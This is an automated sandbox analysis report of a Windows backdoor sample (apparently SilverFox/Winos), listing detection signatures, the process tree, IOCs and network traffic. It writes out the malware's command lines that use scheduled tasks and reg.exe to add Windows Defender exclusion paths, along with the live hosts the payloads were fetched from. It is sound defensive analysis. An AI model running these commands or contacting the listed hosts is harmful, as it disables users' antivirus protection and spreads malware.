Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Gokod.763652.06.exe

Overview

General Information

Sample name:Gokod.763652.06.exe
Analysis ID:1639725
MD5:815b9e41304ca2db2a1f89fbd68639a5
SHA1:211508e3fccb4df2cdb01dc9d8b3dd743dfac826
SHA256:bd2587248361ab3a0f069890945917ecb0b4775985c82fe18629c97d86096706
Tags:backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Adds extensions / path to Windows Defender exclusion list (Registry)
Changes security center settings (notifications, updates, antivirus, firewall)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE
Sigma detected: Windows Defender Exclusions Added - Registry
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • Gokod.763652.06.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\Gokod.763652.06.exe" MD5: 815B9E41304CA2DB2A1F89FBD68639A5)
  • svchost.exe (PID: 7912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8092 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 8188 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7280 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7396 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4964 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • J8daaU.exe (PID: 6360 cmdline: C:\Users\user\Documents\J8daaU.exe MD5: DF76205EAF175184567FC44A83019B20)
  • J8daaU.exe (PID: 7992 cmdline: C:\Users\user\Documents\J8daaU.exe MD5: DF76205EAF175184567FC44A83019B20)
    • cmd.exe (PID: 7216 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4344 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1016 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3888 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1876 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 2768 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1076 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3228 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 1948 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 1200 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4228 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 3892 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2992 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 3044 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4216 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 5044 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4332 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4356 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • schtasks.exe (PID: 4408 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • WerFault.exe (PID: 2692 cmdline: C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cmd.exe (PID: 3984 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5924 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 5644 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 2904 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 2236 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 3116 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 3340 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 4276 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • cmd.exe (PID: 4520 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • reg.exe (PID: 5032 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
  • svchost.exe (PID: 4732 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 1080 cmdline: C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • J8daaU.exe (PID: 4056 cmdline: C:\Users\user\Documents\J8daaU.exe MD5: DF76205EAF175184567FC44A83019B20)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
8.2.J8daaU.exe.1811f7d0000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x213df:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x21492:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x214f0:$e2: Add-MpPreference -ExclusionPath
55.2.J8daaU.exe.2b875810000.1.unpackINDICATOR_SUSPICIOUS_DisableWinDefenderDetects executables containing artifcats associated with disabling Widnows DefenderditekSHen
  • 0x213df:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x21492:$e1: Microsoft\Windows Defender\Exclusions\Paths
  • 0x214f0:$e2: Add-MpPreference -ExclusionPath

System Summary

barindex
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\J8daaU.exe, ParentImage: C:\Users\user\Documents\J8daaU.exe, ParentProcessId: 7992, ParentProcessName: J8daaU.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7216, ProcessName: cmd.exe
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\J8daaU.exe, ParentImage: C:\Users\user\Documents\J8daaU.exe, ParentProcessId: 7992, ParentProcessName: J8daaU.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7216, ProcessName: cmd.exe
Source: Process startedAuthor: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3984, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, ProcessId: 5924, ProcessName: reg.exe
Source: Registry Key setAuthor: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5924, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\user\Documents
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7912, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Gokod.763652.06.exeVirustotal: Detection: 16%Perma Link
Source: Gokod.763652.06.exeReversingLabs: Detection: 16%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknownHTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: Binary string: C:\CodeBases\isdev\redist\language independent\x64\SetupSuite64.pdb source: Gokod.763652.06.exe
Source: Binary string: C:\new-builder\SAC-10.9-dev\master\SAC\Solutions\x64\Release\ManageReaders.pdb source: J8daaU.exe, 00000008.00000002.1541949190.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000008.00000000.1527093516.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000009.00000000.1637253845.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000000.2227008485.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000002.2417861079.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe.0.dr
Source: Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb<< source: Gokod.763652.06.exe
Source: Binary string: F:\4.7.471.07\Sources\_bin\32\Release\PhilipsSpeechDriverConfiguration.pdb source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr
Source: Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdb source: Gokod.763652.06.exe
Source: Binary string: C:\Users\qt\work\qt\qtquickcontrols2\lib\Qt5QuickTemplates2.pdb source: Gokod.763652.06.exe
Source: Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdbII(!GCTL source: Gokod.763652.06.exe
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: aceprocted.sys.0.dr
Source: Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb source: Gokod.763652.06.exe

Change of critical system settings

barindex
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\DocumentsJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramDataJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\UsersJump to behavior
Source: C:\Windows\System32\reg.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)Jump to behavior
Source: C:\Users\user\Documents\J8daaU.exeCode function: 8_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,55_2_00007FF6FCAE9AE0
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Documents\J8daaU.exeCode function: 55_2_000002B873646BE5 InternetOpenUrlA,InternetReadFile,55_2_000002B873646BE5
Source: global trafficHTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: xh4ffp.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: nm25.oss-cn-hangzhou.aliyuncs.com
Source: Gokod.763652.06.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Gokod.763652.06.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: aceprocted.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: Gokod.763652.06.exe, aceprocted.sys.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Gokod.763652.06.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Gokod.763652.06.exeString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
